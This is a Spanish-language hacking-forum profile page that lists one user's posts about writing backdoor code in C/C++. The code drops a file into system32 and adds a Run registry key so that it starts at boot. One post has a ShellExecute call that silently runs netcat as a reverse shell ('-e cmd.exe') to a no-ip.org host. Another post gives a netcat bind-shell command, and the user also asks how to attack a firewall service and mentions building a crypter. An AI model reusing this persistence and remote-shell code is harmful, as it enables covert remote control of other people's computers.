elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: [1] 2 3
1  Seguridad Informática / Hacking / Re: nmap y puertos en: 8 Julio 2011, 16:41 pm
he probado con nessus y la cosa no mejora. Me dice que hay un riesgo bajo con el puerto abierto 8081 pero no dice mucha cosa mas. Alguien puede echar un cable?
2  Seguridad Informática / Hacking / Re: nmap y puertos en: 6 Julio 2011, 21:59 pm
no directamente se cierra la ventana de telnet
3  Seguridad Informática / Hacking / nmap y puertos en: 6 Julio 2011, 21:46 pm
Tengo dos pcs en casa, con dos redes distintas. Una de un operador de cable y la otra wifi. Desde la wifi estoy haciendo pruebas con nmap contra la red cableada, ya tengo muy trillado el tema lan, y es por eso que quiero probar desde redes externas.
Al hacer un scaneo al equipo de red cableada descubro con estupor que hay un puerto abierto, concretamente el 8081. Y el servicio es blackice-icecap. He googleado para ver que es este servicio, y segun se comenta se trataria de un firewall implementado por mcafee. Cierto es que tengo mcafee en mi sobremesa instalado, con lo cual parece que todo concuerda. Paso al siguiente paso. Intento acceder por telnet, y por navegador web a esa ip de mi sobremesa con el puerto 8081, sin resultados.
Alguien puede darme ideas de como atacar ese servicio? En teoria habia un bug del año 2000 que permitia un logeo al router con ese firewall con user iceman y pass en blanco, pero evidentemente eso esta mas que parcheado. Se valoraran ideas, por mas vueltas que le doy no se por donde seguir.
4  Programación / Programación C/C++ / Re: ftp en c++ en: 9 Noviembre 2010, 18:41 pm
Interesante lo que propones yo te diria que jugases con strcat:

5  Programación / Programación C/C++ / Meter archivo en ruta en: 7 Octubre 2010, 21:11 pm
Vereis estoy realizando un programa en c que descarga un archivo y lo mete en la ruta de system32.
Si le pongo la ruta c://windows//system32 descarga el programa y lo introduce correctamente. Ahora bien como eso solo me funciona cuando system32 esta en c, y dentro de ese directorio concreto indagando vi la posibilidad de hacer lo mismo pero poniendo %systemroot%/system32 pero asi resulta que no me mete ningun archivo en system32. Quisiera saber que pongo mal. He probado en vez de esta / con la barra invertida pero tampoco. Tambien con dos barras. Lo hago introduciendo una key en el registro de windows con las apis de win.
6  Programación / Programación C/C++ / Crear registros con APIs en: 25 Agosto 2010, 00:04 am
Hola, estoy intentando crear un registro en c++ con APIs para que cuando reinicie el pc ejecute un programa. De momento lo estoy intentando con este codigo pero algo falla y no se que puede ser. Un saludo.

Código:
#include <windows.h>

int main()
{
        LPSTR lpSubKey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
   HKEY hkResult = 0;

        RegOpenKeyEx(HKEY_CURRENT_USER, lpSubKey, 0, KEY_WRITE, &hkResult);
        {
      HKEY hKey = 0;
      LPSTR lpValueName = "ejemplo";
      LPSTR lpData = "C:\\ejemplo.exe";
 
                RegSetValueEx(hKey, lpValueName, 0, REG_SZ, (LPBYTE)lpData, lstrlen(lpData));     


      RegCloseKey(hKey);
        }
 
}
7  Seguridad Informática / Análisis y Diseño de Malware / Re: Add reg en: 23 Agosto 2010, 11:53 am
Bueno Lord creo que he entendido los porques de los consejos que me dabas de no usar system. Creo que con system se abre la ventana de ms-dos y no hay forma de cerrarla, con lo cual el nc canta que no veas. Me he decidido a probar suerte con las APIs aunque soy un verdadero novato en esto. He intentado lo siguiente pero sin exito, ya que nc no conecta:

Código:
#include <windows.h>

int main()
{
   ShellExecute(NULL, NULL, "C:\\WINDOWS\\System32\\nc -d xxx.no-ip.org 25 -e cmd.exe", NULL, NULL, SW_HIDE);
   return 0;
}

Gracias Herricreu por tus consejos pero si migro el programa a APIs y dejo system lo que quiero es crear nuevos registros. He estado mirando en: http://msdn.microsoft.com/en-us/library/ms724875(v=VS.85).aspx y creo que deberia usar RegCreateKeyEx Function, estoy en lo cierto?
He intentado lo siguiente:

Código:
#include <windows.h>
int main()
{
HKEY hkey;
RegOpenKeyEx
(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&hkey);
RegSetValueEx(hkey,"nercar",0,REG_SZ,(const unsigned char*)"%windir%\\nercar.exe",sizeof"%windir%\\nercar.exe")     
}

mi intencion seria crear ese registro para que inicie el nc que antes habre metido en system32.
8  Seguridad Informática / Análisis y Diseño de Malware / Re: Add reg en: 21 Agosto 2010, 18:56 pm
Gracias por las respuestas. Vereis soy relativamente nuevo en el mundo de la programacion en c plus plus. Y evidentemente desconozco muchas cosas importantes, como por ejemplo los sockets, y la API de windows. Entonces lo que intentaba desde mis modestos conocimientos era meter un ejecutable en la carpeta system32 con un programa en c plus plus. Y la mejor manera con mis escasos conocimientos era con registros y con la funcion system. Lord, me dices que es mala practica, sigo sin entender porque, pero lo respeto porque tu sabes muchisimo mas que yo. Alabo tu consejo sobre las APIs e intentare aprenderlas, pero de momento quiero mejorar mi base en c plus plus, todavia desconozco muchas librerias, muchas funciones, tema punteros y demas. De todos modos si teneis a bien explicarme en detalle porque no usar system con razonamientos tecnicos os lo agradeceria. No quiero ser un chapucero, y me gusta que la gente que sabeis me ayudeis.
Aun asi quiero plantearos ciertas dudas que me han surgido con el tema registros

porque no es lo mismo poner HKCU/software/microsoft que poner HKCU\Software\microsoft
o porque tampoco es igual poner una sola barra o poner dos barras HKCU//software//microsoft.
Del mismo modo querria saber si es posible incluir en registro la ejecucion de un programa en modo consola y el agregarle a la vez ciertos parametros ej: nc -vv -l -e -p 1234 y que los ejecute cuando reinicie el pc.
Imagino que son dudas y no se si merecen ser respondidas. Si alguien tiene a bien contestar que no dude se lo agradecere. Hasta ahora todo el mundo ha sido muy correcto conmigo y he aprendido mucho aqui, pero si pregunto cosas tontas tambien agradezco se me diga. Google lo tengo bastante trillao pero nunca se sabe si uno esta resultando estupido y hasta que punto.
Gracias por todo.  Yo por mi parte estoy preparando algo que me lleva de momento 3 semanas de duro trabajo. Si con ayuda logro mis objetivos prometo sacar un text para compartirlo con la comunidad. Creo que seria interesante, es algo que es un poco chapucero porque no soy ningun experto, pero creo que es bastante imaginativo, y creo que de momento nunca se ha hecho en el mundo del hack. No me importaria publicarlo y demostrar que a veces las inseguridades estan en zonas de lo mas inexploradas. Un saludo
9  Seguridad Informática / Análisis y Diseño de Malware / Add reg en: 19 Agosto 2010, 09:00 am
Vereis estoy con c++ intentando meter una clave en el registro pero no lo logro. Este es el codigo que trato de implementar. Alguien puede decirme que estoy haciendo mal o porque no agrega nada al registro?

system("ADD REG hklm/software/microsoft/windows/currentversion/run /v eudcedit /f /d c:/windows/system32/eudcedit.exe");

10  Programación / Programación C/C++ / Crypter y PE en: 15 Agosto 2010, 11:21 am
Vereis estoy creando con un amigo un crypter en c plus plus. Lo tenemos practicamente acabado pero tenemos un problema cuando mueve datos del PE. Si hay alguien interesado en colaborar, nos encontramos un poco bloqueados, por favor que me mande un privado y le envio el codigo. Un saludo.
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines